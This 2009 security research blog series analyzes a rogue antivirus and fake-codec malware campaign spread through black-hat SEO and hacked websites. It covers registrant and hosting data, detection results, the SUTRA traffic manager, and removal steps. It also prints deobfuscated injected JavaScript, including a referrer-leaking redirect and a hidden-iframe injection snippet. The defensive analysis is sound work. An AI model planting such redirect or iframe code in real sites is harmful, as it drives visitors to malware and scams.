Sunday, March 29, 2009

Black Hat SEO and Rogue Antivirus p.3

The silent threat: Black Hat SEO and Rogue Antivirus

AntivirusPlus ZlKon Malware drop -

READ THIS page if you need more information

In addition to fake scanner domain, recent research also reveal that several sites are
registered through "EVOPLUS LTD" with the information as follow:

Live Internet Marketing Limited ****
attn: Private Registrations
5285 Decarie Boulevard #100
Montreal, QC H3W3C2

Registrar: EVOPLUS LTD
Whois Server:
Referral URL:
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 27-mar-2009
Creation Date: 20-feb-2009
Expiration Date: 20-feb-2010

Registered Through: (


Looking on google show absolutely no web presence apart from malware and pornography websites:

For "liveinternetmarketingltd": Malware domain drop and pornography websites
For "Live Internet Marketing Limited": Pornography websites
For "": Pornography websites and malware domain found by Malware Domain List.

Looking on malwaredomainlist show 23 sites with the registrant information "".

Some domain have been added to the list below:



Symantec Result
Registration Service Provided By: HIGH QUALITY HOST COMPANY
Symantec Result
PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM
PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM

Registration Service Provided By: ERDOMAIN.COM
Registrant: uebochek - Luhansk Oblast,01001 - UA -


ACTIVE domain

PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM
*** has a fake error page which redirect to is also hosted on the same IP at ZlKon, also registered by "Live Internet Marketing Limited" and the fraudulent payment page is on the domain below: -

Registration Service Provided By: RESELLERCLUB

Globo inc
John Sparck (
South reg, 14 st, 3
Tel. +27.221994

"Globo inc" include:, (Already suspended)

Looking on spamhaus also reveal [] []

Host on [] AS12553


Some screenshot


 File info:installer_1.exe 
 File size666112 bytes 
 First received03.27.2009 17:40:50 (CET) 
 Results17/38 (44.74%) 
  (Suspicious) - DNAScanCAT-QuickHeal 
  Generic Downloader.xMcAfee 
  Generic Downloader.xMcAfee 
  Suspicious FilePanda 
  Trojan HorseSymantec 

We can see on this post that the file downloaded two or three days after is updated with a new code.

Result when running:
HTTP Request: []


 File info:AntivirusPlus.exe 
 File size1435136 bytes 
 VirusTotal:First Report 
 VirusTotal:Second Report 
 First received03.27.2009 14:17:34 (CET) 
 ResultsResult: 7/39 (17.95%) 
 Second time03.30.2009 05:23:52 (CET) 
 ResultsResult: 12/39 (30.77%) 
 New infoPrevx 

 File info:InternetExplorer.dll 
 File size442368 bytes 
 VirusTotal:First Report 
 VirusTotal:Second Report 
 First received03.24.2009 16:12:30 (CET) 
 ResultsResult: 20/39 (51.29%) 
 Second time03.30.2009 05:23:52 (CET) 
 ResultsResult: 20/39 (51.29%) 


Saturday, March 28, 2009

Black Hat SEO and Rogue Antivirus p.2

The silent threat: Black Hat SEO and Rogue Antivirus

The World Wide Web Consortium and Rogue AV

Having your website hacked with IFRAME injected, trojans/backdoors?

Having your pages infected with redirection to rogue antivirus/antispyware?

Having your pages replaced with World Wide Web Consortium article and some
obfuscated javascript code append to them?

This page will show you some recent research about a malware campaign which has infected thousand of websites. In this campain all of these sites have been used to distribute fake antispyware called WinWebSec or FakeSpyGuard.(Sometimes called WinWebSecurity or SystemSecurity2009 with InternetAntivirusPro)

Since July/August 2008 hundreds of thousands of pages on legitimate domains were exploited having web pages stuffed with keywords (porn, celebrities, popular snacks) uploaded to them as a means of attracting victims via search engine results. In some cases, the homepage of the compromised site is being modified, appending hidden links to the malicious web page.

All info concluded that the attack was made via stolen FTP password, on all these domains.

An alarming observation also reveal that the activity grows at an exponential rate with malware/exploit code even more sofisticated.

You can find some IPs, network, domain used, example of hacked pages/websites and other malicious code injected into these domain on the links below or on other page on this blog.

The silent threat: Black Hat SEO and Rogue AV - 1
The silent threat: Black Hat SEO and Rogue AV - 2


Screenshot below show tons of websites also used in this rogue av malware campaign but with some World Wide Web W3C pages uploaded with javascript code injected.

Source of on of these site.

In a browser.

Deobfuscation results:

window.location = encodeURI(
"" +
encodeURIComponent(document.referrer) + "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=" +
encodeURIComponent(document.URL) + "&default_keyword=XXX");


The source code also reveal thousand of hacked websites.The analysis of the javascript code redirect to or some domain used in this attack.
You can find information on this page.

Black Hat SEO - PDF Malware campaign

The silent threat: Black Hat SEO - PDF Malware campaign

Previously in March, Abode has released some security updates addressed to
vulnerabilities and exploits using Adobe Reader. Some links can be found below

McAfee Avert Labs: New Backdoor Attacks using PDF Documents
Trend Micro Malware Blog: Portable Document Format or Portable Malware Format?
SANS Internet Storm Center: Adobe/Acrobat 0-day in the wild?

Adobe Security Bulletin: Buffer overflow issue

Here is a complete example with sreenshots, data and analysis of a website
used in the PDF malware campaign and hosting a malicious application called SUTRA.

The application also known as "Traffic Management System" is explained by
McAfee AvertLabs on this page: Inside the malicious traffic

This cybercrime toolkit is actively used to manage traffic from compromised
websites and redirects visitors to exploits code or other malicious URLs with
fake codecs, rogue antispyware application, keyloggers, bankers trojan and many more.

We have another example of a compromised website explained here.
Screenshot of SUTRA can be found.


Now let's take a look of another website used.

The site is ""
[Do not enter this site unless you know what you are doing]

The payload is located here "" [Unstable - file not found at this time]

Just for your information, this is the structure of files/folders for SUTRA Traffic Manager

drwxr-xr-x (755) admin
drwxrwxrwx (777) data
drwxr-xr-x (755) files
drwxr-xr-x (755) html
drwxr-xr-x (755) install
drwxrwxrwx (777) memory
drwxrwxrwx (777) stats
drwxrwxrwx (777) admin/tmp
drwxrwxrwx (777) admin/tmp.web
-rwxr-xr-x (755) getos.cgi
-rwxr-xr-x (755) in.cgi
-rw-r--r-- (644) index.html
-rwxr-xr-x (755) c.cgi
-rwxr-xr-x (755) center.cgi
-rwxr-xr-x (755) cron
-rwxr-xr-x (755)
-rw-r--r-- (644) index.html
-rw-r--r-- (644) panel.html
drwxrwxrwx (777) tmp
drwxrwxrwx (777) tmp.web
-rwxr-xr-x (755) ub_fetcher
-rw-r--r-- (644) admin_forces.html
-rw-r--r-- (644) connection_type.html
-rw-r--r-- (644) connection_type_new.html
-rw-r--r-- (644) crontab_wizard.html
-rw-r--r-- (644) edit_force_data.html
-rw-r--r-- (644) edit_force.html
-rw-r--r-- (644) edit.html
-rw-r--r-- (644) edit_user.html
-rw-r--r-- (644) force_data.html
-rw-r--r-- (644) force.html
-rw-r--r-- (644) forces.html
-rw-r--r-- (644) forces_view.html
-rw-r--r-- (644) general_stat.html
-rw-r--r-- (644) GeoIP.dat
-rw-r--r-- (644) geoip.html
-rw-r--r-- (644) global_options.html
-rw-r--r-- (644) global_vars.html
-rw-r--r-- (644) import.html
-rw-r--r-- (644) index.html
-rw-r--r-- (644) key
-rw-r--r-- (644) login.html
-rw-r--r-- (644) lstats_export.html
-rw-r--r-- (644) lstats.html
-rw-r--r-- (644) main.html
-rw-r--r-- (644) navigation.html
-rw-r--r-- (644) page.html
-rw-r--r-- (644) pages_navigation.html
-rw-r--r-- (644) profile.html
-rw-r--r-- (644) pstats_export.html
-rw-r--r-- (644) pstats.html
-rw-r--r-- (644) pstats_index.html
-rw-r--r-- (644) register_done.html
-rw-r--r-- (644) register.html
-rw-r--r-- (644) search.html
-rw-r--r-- (644) show_bottom.html
-rw-r--r-- (644) show_data.html
-rw-r--r-- (644) show_header.html
-rw-r--r-- (644) stat_daily.html
-rw-r--r-- (644) static_stat.html
-rw-r--r-- (644) stat_main.html
-rw-r--r-- (644) stats.html
-rw-r--r-- (644) uptime_main.html
-rw-r--r-- (644) users.html
-rw-r--r-- (644)
-rw-r--r-- (644) counter.gif
-rwxr-xr-x (755) curl
-rwxr-xr-x (755) default.cgi
-rwxr-xr-x (755) gotourl.cgi
-rw-r--r-- (644) image files and javascript (gif, js)
drwxr-xr-x (755) freebsd4 // in.cgi
drwxr-xr-x (755) freebsd5 // in.cgi
drwxr-xr-x (755) freebsd6 // in.cgi
drwxr-xr-x (755) linux // in.cgi
-rw-r--r-- (644) index.html

The admin page has no password on this server so you can enter and see stats like:

So now we know the IP, domain name, URLs used after redirection
but from were is coming the traffic?

Let's take a look of another folder "/memory/"

This folder has files like 1.access.log, 2.access.log, 5.access.log,
25.access.log, 70.access.log etc...

Some related topics on this blog refer to, for another malware campaign... Similars files can be found using google. here and here

2.access.log - The file contain the IP of visitors reaching infected
websites, some are in Czech Republic, Israel, Russia, Turkey etc.
The file also reveal the URL of some compromised websites
were the malicious obfuscated javascript code has been inserted.

Line 1:

Javascript Analysis

Line 23: 77.250.xx.xx

Javascript Analysis

Javascript Analysis

The analysing confirm that all these site has the same code added

if (!myia){ document.write(unescape('
var myia = true; </script>
<iframe name=c15 src=''+
width=52 height=414 style='display: none'></iframe>

Analysis report for hxxp://

The script load a PDF located here[BLOCKED]e30/pdf.php?id=5352
which then load this executable --> VirusTotal Report


Some other related link:

Honeynet Malware Detail
Analysis of hxxp:// here

MySpace Profile Attacked (screenshot below)

loyaldown-loyaltube Fake Codec and RogueAV, Fake Codec and Rogue Antivirus, are site that distribute fake codec.
We also have on this network sites which host rogue application like
XP-Police-Antivirus and Win-PC-Defender

Fake codec and fake scanner page screenshot [] []




Redirectors used: hxxp://
Analysis here

 Site URLs:hxxp:// 
 File info:codec.exe 
 File size107011 bytes 
 Anubis:Report (related: WinPC Defender) 
 First received03.29.2009 01:17:30 (CET)
 Results6/39 (15.39%) 
 Alias:(Suspicious) - DNAScanCAT-QuickHeal 
  Suspicious File eSafe 

 Site URLs:hxxp:// 
 File info:codec.exe 
 File size107008 bytes 
 Anubis:Report (related: WinPC Defender) 
 First received03.29.2009 01:41:38 (CET)
 Results6/39 (15.39%) 
 Alias:(Suspicious) - DNAScanCAT-QuickHeal 
  Suspicious File eSafe 

Associated websites:


av-best-info Anti-VirusN1 Rogue FakeXPA "VirusDoctor Online Scan" Anti-Virus1 Rogue FakeXPA is a site that distribute AntivirusN1 a rogue antivirus application.
AntiVirusN1 displays fake alerts in order to persuade users buying it.

Registry keys/values must be deleted with antivirus / antispyware.
Anti-Virus Number-1 can be removed by stopping the following processes

- Kill processes: N1Two.exe, N1i.exe, 2.exe, 3.exe
- Unregister DLLs (regsvr32 /u [dll_name]): QWProtect.dll

- Delete files and folders:

  • ► C:\Documents and Settings\All Users\Application Data\N1
  • ► %CommonAppData%\N1
    ► %CommonPrograms%\Anti-Virus Number-1

This site appear to be normal at first sight.

Antivirus 1 Site Screenshot

Antivirus 1 Payment system

The payment system for this fraudulent and rogue program is made via Plimus (screenshot below)

Antivirus 1 Payment system by Plimus

But the site has been reported as malicious by some users. Here is the fake scanner

Site screenshot:

Fake Security Warning Message:

Adware.Win32.Look2me.ab Virus Critical Virus High
Trojan-Downloader.Win32.Small.dge Virus High
Trojan Horse IRC/Backdoor.SdBot4.FRV Virus Medium
W32.Benjamin.Worm Virus High
W32.Mypics.Worm.36352 Virus Medium
W32.Yaha.B@mm Virus Critical
Trojan Horse Generic11.OQJ Virus High
Magic DVD Ripper Virus High
Recommend: Click "Start Protection" button to erase all threats

Fake Security Warning Message

Fake Security Warning Message: Threat detected

Fake scanner page

Fake messages:

Fake Security Warning Message

Alert! Your PC is at risk of virus and spyware attack.

Your system requires immediate check!i
System Security Scanner will perform a quick and free scan of your PC for viruses and spyware programs.

Associated website [] []


 Site URLs: hxxp://
 File info:AntiVirusInstaller.exe 
 File size53278 bytes 
 First received03.28.2009 19:18:31 (CET)
 Results8/39 (20.52%) 
  Trojan.DownLoad.33135 DrWeb 
  Suspicious File eSafe 
  Suspicious FilePanda 

When running:

 HTTP Requests:[] 
  Content html: 
  Content html: 
 File info:2.exe 
 File size53248 Bytes 
 VirusTotal:Report Alias: Trojan.Win32/FakeXPA 
  Received on 03.28.2009 22:08:07 (CET) 
  8/39 (20.52%) 
 File info:3.exe 
 File size257536 Bytes 
 VirusTotal:Report Alias: Trojan.Win32/FakeXPA 
  Received on 03.28.2009 22:08:18 (CET) 
  6/39 (15.39%) 
 File info:AntiVirusInstaller.exe 
 File size53278 Bytes 
 VirusTotal:Report Alias: Trojan.Win32/FakeXPA 
  Received on 03.28.2009 22:08:19 (CET) 
  8/38 (21.06%) 
 File info:N1.CAB 
 File size504489 Bytes 
 VirusTotal:Report Alias: Trojan.Win32/FakeXPA / Trojan.Win32.Tibs 
  Received on 03.28.2009 22:08:51 (CET) 
  5/38 (13.16%) 
 File info:N1.exe 
 File size527360 Bytes 
 VirusTotal:Report Alias: Trojan.Win32/FakeXPA / Trojan.Win32.Tibs 
  Received on 03.28.2009 22:09:09 (CET) 
  5/38 (13.16%) 
 File info:QWProtect.dll 
 File size697856 Bytes 
 VirusTotal:Report Alias: Trojan.Win32/FakeXPA 
  Received on 03.28.2009 22:09:01 (CET) 
  4/38 (10.53%) 
 File info:svchost.exe  
 File size80896 Bytes 
 VirusTotal:Report Alias: Trojan.Win32/FakeXPA 
  Received on 03.28.2009 22:08:47 (CET) 
  10/38 (26.32%) 

Result when running:
Display fake BlueScreen "MALWARE.MONSTER.DX_NEW_0xA21518F0"

Fake bluescreen message: MALWARE.MONSTER.DX_NEW_0xA21518F0

Rogue Anti-Virus Number-1

Anti-Virus Number-1 Rogue Application Screenshot:

Friday, March 27, 2009

Black Hat SEO and Rogue Antivirus

The silent threat: Black Hat SEO and Rogue Antivirus

Messages telling you to install and update security software for your computer is a scary message.
This tactic is known as scareware:

Related article about "Free Security Scan" alerts from the Federal Trade Commission
Court Halts Bogus Computer Scans
"Free Security Scan" Could Cost Time and Money

Since several months ago, massive attacks (obfuscated javascript inserted - IFRAME to inject backdoors/keyloggers), thousand of hacked websites used to distribute rogue antivirus have been detected by major antivirus vendors, cyber intelligence labs and other security companies.

The exponential growth of rogue antivirus distribution through legitimate websites remain silent as the tactic used by the creators continued to become more sophisticated.

Related article: Scammers making '$15m a month' on fake antivirus
PandaLabs: 22,000 New Malware Samples Detected Every Day in 2008
PandaLabs Annual Report

Rogue AV Detections in 2008

Sites on this blog refers to rogue antispyware which display misleading scan alerts and mostly installed on computer's victim without user consent throught infected websites (LEGITIMATE infected websites).


The site now include IPs / botnet C&C / data logs exposed, links to LIVE urls exploits/vulnarabilities (flash - pdf) and domains with their relations, route, AS and malicious scripts found on
compromised websites related to the same campaign.

If you arrived to this page through a search engine about a domain in this blog, some removal information can be found on the links below. Sites analysis will be created and updated as new sites will be found. Twice or more a day if needed.

If you arrived to this page and you are interested to find some information about these attacks,
IPs domains and networkd used, here are some links used with details about this malware campaign

Related article:

Black Hat SEO and Rogue Antivirus: Rogue Fake SpyGuard Malware Defender 2009
Black Hat SEO and Rogue Antivirus: Fraudulent payment processors Antivirus360
Black Hat SEO and Rogue Antivirus: Fake Scanner RapidAntivirus templ. AntivirusPlus
Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro
Black Hat SEO and Rogue Antivirus: ZlKon Malware Drop
Black Hat SEO and Rogue Antivirus: AntiSpyware Pro 2009
Black Hat SEO and Rogue Antivirus: Rogue Fake SpyGuard
Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro
Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro new variants

Black Hat SEO and Rogue Antivirus:

Part. 1) Black Hat SEO and Rogue Antivirus
Part. 2) Black Hat SEO and Rogue Antivirus: The World Wide Web Consortium Mystery
Part. 3) Black Hat SEO and Rogue Antivirus: AntivirusPlus ZlKon and
Part. 4) Black Hat SEO and Rogue Antivirus: Full or Rogues
Part. 5) Black Hat SEO and Rogue Antivirus: Full of Hacks
Part. 6) Black Hat SEO and Rogue Antivirus: Analyzing the tactic p.1
Part. 7) Black Hat SEO and Rogue Antivirus: Analyzing the tactic p.2
Part. 8) Black Hat SEO and Rogue Antivirus: Fake AV + Rootkit TDSS / Alureon / DNSChanger

Black Hat SEO - Exploit, scripts, botnet C&C, hacks toolkit etc.

Part. 1) Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Thousand of domain attacked
Part. 2) Black Hat SEO - Cyber Crime Toolkit Exposed: Welcome to LuckySploit:) ITS TOASTED
Part. 3) Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Triple threats
Part. 3) Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Crimaware toolkits in the wild

And here we have a list of fake scanner websites used in the attack which infect thousand of websites to distribute malware also known as WinWebSec (WinWebSecurity or SystemSecurity2009): Black Hat SEO and Rogue Antivirus


Other rogue av like AntivirusPlus through this list has been detected recently

Many more like under the name of FakeSpyGuard, VirusRemover, WinAntiVirus2008, SpywareRemover2009, and some variant of "Trojan Hiloti" through this list

Similar attacks with Google search strings :

In 2008: We have an example with "Antivirus 2009" on the Trend Micro Malware Blog:
A Million Search Strings to Get Infected

A few days ago: On the CA website "" is cited. The article is here:
Rogue Security Software keeps on hitting Google searches

Another list of fake codec websites in March on the Dancho Danchev's blog alsocited on this blog
Bogus LinkedIn Profiles Redirect to Malware and Rogue Security Software

And recent search also reveal the use of a powerfull javascript library jQuery - the screenshot below has been retreived from a legitimated infected website.

Deobfuscated result is:

The ip is (ZlKon)

Network used for hosting these malicious website are

Starline Web Services in Estonia
Zlkon in Latvia
netdirekt e.K. in Germany
Hetzner Online AG in Germany
Ural-NET in Russia
Eurohost LLC in Ukraine
GloboTech via Olexij Khrenov in Ukraine
Joint Multimedia Cable Network in Ukraine
NTColo Networks in Ukraine
Plitochnik Lux LTD in Ukraine
Coloquest in US
Netelligent Hosting Services Inc in US
and some other in China, Moldavia.
IPs, AS and network used can be found on this blog.

New sites used

on March 28:,,,,
on March 29:,,

on March 30: [redirection by] and [redirection by],

Analysis here


Related article: The rash of rogue av (PDF)

Related article about McColo Business:
Similar network at UltraNet Ltd in Lavtia
HostExploit’s Cyber Crime Series (PDF)

The list on your right hand side are latest websites used in this malware campaign. (Updated daily)

Some interesting links about malicious traffic at DATORU EXPRESS SERVISS - ZlKon in Latvia
Pages related to the same attack. (Included some other problems, SPAM, botnet etc...)

December  15, 2008:
FakeAV and Codecs

December  19, 2008:
SPAM IP Detected

McAfee Avert Labs Blog
Monday January 5, 2009
Explanation of the so-called “Traffic Management System” - Inside The Malicious Traffic Business
We also have an complete example here. From the visitor to the legitimate infected website (with logs, screenshot, ips and analysis of the malicious website as well as the technic used. i.e: SUTRA traffic redirection, PDF exploit to inject backdoors etc..)

Zeus Tracker

Wednesday January 7, 2009
Google Code Project Abused by Spammers

January 19, 2009
Inaccurate whois details

January 2009
Paragraph:Sunbelt's Jordan said those responsible for DNSChanger appear to have begun moving to a new base of operations over the past few weeks, to a network in Latvia, called ""

Paragraph from the

Interestingly, within the mirrored copy now tweaked and distributed for free using free image hosting services as infrastructure provider for the layout, there are also leftovers from the original campaign template that they mirrored - which ultimately leads us to DATORU EXPRESS SERVISS Ltd (AS12553 PCEXPRESS-AS) or In the wake of UkrTeleGroup Ltd's demise -- don't pop the corks just yet since the revenues they've been generating for the past several years will make it much less painful -- a significant number of UkrTeleGroup customer, of course under domains, have been generating quite some malicious activity at for a while.

January 25, 2009
Rogue software - FakeAV

February 5, 2009
Similar attack with the same added code between like <!-- ad --> <!-- /ad -->
(Same code here)


Wednesday February 25, 2009
Google Trends Abused to Serve Malware